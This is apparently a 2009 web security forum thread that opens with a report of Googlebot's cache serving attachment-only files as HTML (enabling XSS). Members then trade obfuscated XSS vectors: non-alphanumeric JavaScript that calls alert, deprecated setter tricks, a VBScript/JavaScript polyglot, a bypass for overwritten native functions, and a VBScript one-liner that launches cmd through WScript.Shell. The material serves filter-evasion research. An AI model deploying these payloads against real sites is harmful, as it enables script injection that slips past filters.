Anonymous Googlebot Injection

Consider situations in which agents should *never* treat an HTTP response as an HTML entity. Examples include response headers "Content-Disposition: attachment" which indicates the entity is not same-origin, and "Content-Type: application/binary" which indicates the entity is executable or has no format.

According to Google's own documentation http://code.google.com/p/browsersec/wiki/Part2#Content_handling_mechanisms the latter situation is handled correctly by all modern web browsers.

It is not handled correctly by Googlebot.

Proof of concept http://www.google.com/search?q=site%3Aforums.xmbforum.com+%22Cross-Site+Scripting+With+Content+Disposition%22&filter=0 Click on the links I posted there and you will only get a download prompt. Click on one of the Google Cached copies and you get XSS. In fact, I'm not aware of any way to prevent Googlebot from doing this.

The potential for a self-propagating Googlebomb is mind boggling.

i think that is a nice one

v=(/t/+[])[1];
x=(/r/+[])[1];
y=(/o/+[])[1];
z=(/C/+[])[1];
d=(/./+[])[1];
o=(/n/+[])[1];
i=(/i/+[])[1];
t=String(v+y);
s=String((/S/+[])[1]+v+x+i+o+(/g/+[])[1]);
a=String(d+(/f/+[])[1]+x+y+(/m/+[])[1]+z+(/h/+[])[1]+(/a/+[])[1]+x+z+y+(/d/+[])[1]+(/e/+[])[1]);
j=String((/j/+[])[1]+y+i+o);
e=self[490837[t+s](32)];
c=e(s+a);
e(c(97)+c(108)+c(101)+c(114)+c(116)+c(40)+c(39)+c(79)+c(119)+c(110)+c(101)+c(100)+c(32)+c(98)+c(121)+c(32)+c(84)+c(101)+c(97)+c(109)+c(32)+c(78)+c(48)+c(48)+c(66)+c(33)+c(39)+c(41));

skymuss

@Robert Chapin

Yeah it is an interesting idea, I pondered this myself a few times as well, abusing the GoogleBot is still fairly un-researched. Not to mention abusing the Google Spider to pro grammatically redirect it upon entry, and let it loop between pages or two sites, I wonder how it will react to that. ;-)

@Robert Chapin @rvdh

I've seen the GoogleBot used for XSS and SQL Injection attacks against my own sites. I agree with Ronald this is a under-researched area

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

eval(new Array(new Array(new Array(new Array('aler'))))+Array('t')+[]+Array(Array(Array('(1)'))))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

note that that google cache version also links to a "text-only" version, which will not execute the javascript:
http://209.85.129.132/search?q=cache:w790MtEFa5kJ:forums.xmbforum.com/files.php%3Fpid%3D1361320%26aid%3D20274+site:forums.xmbforum.com+%22Cross-Site+Scripting+With+Content+Disposition%22&hl=en&strip=1

That doesn't really change anything, of course. Just sayin'

VBScript one-liner (run CMD):

Dim a : Dim b : a = chr(87) + chr(83) + chr(99) + chr(114) + chr(105) + chr(112) + chr(116) + chr(46) + chr(83) + chr(104) + chr(101) + chr(108) + chr(108) : b = chr(99) + chr(109) + chr(100) : CreateObject(a).Run b

http://www.security-net.biz/



Edited 1 time(s). Last edit at 04/07/2009 04:58PM by Ivan.

corollary : Google Language Tools + Anonymous Googlebot Injection = More XSS

Proof of concept http://translate.google.com/translate?u=http%3A%2F%2Fforums.xmbforum.com%2Ffiles.php%3Fpid%3D1361320%26aid%3D20275&sl=en&tl=es&hl=en&ie=UTF-8

Edit: Don't be fooled by the frameset in there. The demonstration simply shows the payload need not be cached or indexed.



Edited 3 time(s). Last edit at 04/07/2009 07:15PM by Robert Chapin.

http://www.thespanner.co.uk/2009/04/08/onreadystatechange/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Can this be beaten?

http://www.thespanner.co.uk/2009/04/08/overwriting-native-functions-in-javascript/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth Heyes Wrote:
-------------------------------------------------------
> Can this be beaten?
>
> http://www.thespanner.co.uk/2009/04/08/overwriting
> -native-functions-in-javascript/

Yes, it can be beaten quite easily:

try { // Firefox
  delete window.alert;
} catch(e) { // IE
  with(document) window.alert = body.appendChild(createElement("frame")).contentWindow.alert;
}

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Damn my stupidity, I will learn to stop trying soon.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

setTimeout(
-
+
1
+
/[ + - ~ alert//gsdfgdfg\
(1)]/
+
-
+ 1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's how to use FF constants within a new function and .tosource to make FF protect functions. The slice is used to removed the const declaration after but it is illegal to redeclare alert.

eval(new Function('const alert=function(native){var counter = 0;return function(str) {if(counter < 10) {native(str);}counter++;}}(window.alert);delete alert;alert(alert)').toSource(2).slice(36).slice(0,-1));

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

o={b setter:Function}.b='alert\x28\x31\x29'
new o

Or if you prefer:-
new({b setter:Function}.b='alert\x28\x31\x29')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 04/09/2009 10:31AM by Gareth Heyes.

Gareth Heyes Wrote:
-------------------------------------------------------
> o={b setter:Function}.b='alert\x28\x31\x29'
> new o
>
> Or if you prefer:-
> new({b setter:Function}.b='alert\x28\x31\x29')


awesome! i love seeing this deprecated setter notation abused :)

@thornmaker

Thing is they've stopped native assignments this way but using Function still works :) Please invent some more custom syntax Mozilla I like it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

http://gim.constructor.com/self?foo=bar[top]:true

:)

I love being right when I thought I was wrong.

http://www.thespanner.co.uk/2009/05/08/opera-xss-vectors/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

<%<!--'%><script>alert("XSS");</script>-->

----------------------------------------------

http://www.pulog.org

@wpulog

Nice I like it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

not working for me in FF.

http://wocares.com/xsstester.php?yxss=1&xss=%3C%25%3C!--%27%25%3E%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E--%3E+&order_0=0&maxlen=0&order_1=10&s11=&s12=&order_2=20&r11=&r12=&order_3=30&order_4=40&order_5=50&order_6=60&order_7=70&order_8=80&order_9=90&order_10=100&order_11=110&order_12=120&order_13=130&order_14=140&s21=&s22=&order_15=150&r21=&r22=&order_16=160&r31=&r32=&order_17=170&enviroment=%5Bcont%5D&headers=



Edited 1 time(s). Last edit at 05/13/2009 08:24AM by Kyo.

Worked for me in IE

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

FF only vector hehe

<body onload=&lt;!--&#10alert(1)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

No alnum, only symbols.

tested on Firefox. not work on IE.

//-----------------------------------------------------------------------------
_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$$=({}+"")[_____]+
({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)
+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$$=(($!=$)+""
)[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")
[_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+
({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")();

--
Yosuke HASEGAWA
http://utf-8.jp/

nice one Yosuke. I wonder what the shortest non-alphanumeric code is is the same as: eval(name)

Yosuke sweet! More please

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Very nice indeed! Time for a new contest? ;)

Shortest alert(1) without using alphanum chars?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Polyglot script.
works as VBScript on IE and works as JavaScript on other browsers.
--
<script la[0x00]nguage="vbscript" language="javascript">
rem = null; foo = function( msg ){
rem /*
Function foo( msg )
rem */ MsgBox = alert;
MsgBox(msg)
rem /*
End Function : rem */ }
</script>
...
<script la[0x00]nguage="vbscript" language="javascript">
foo("abcd")
</script>
--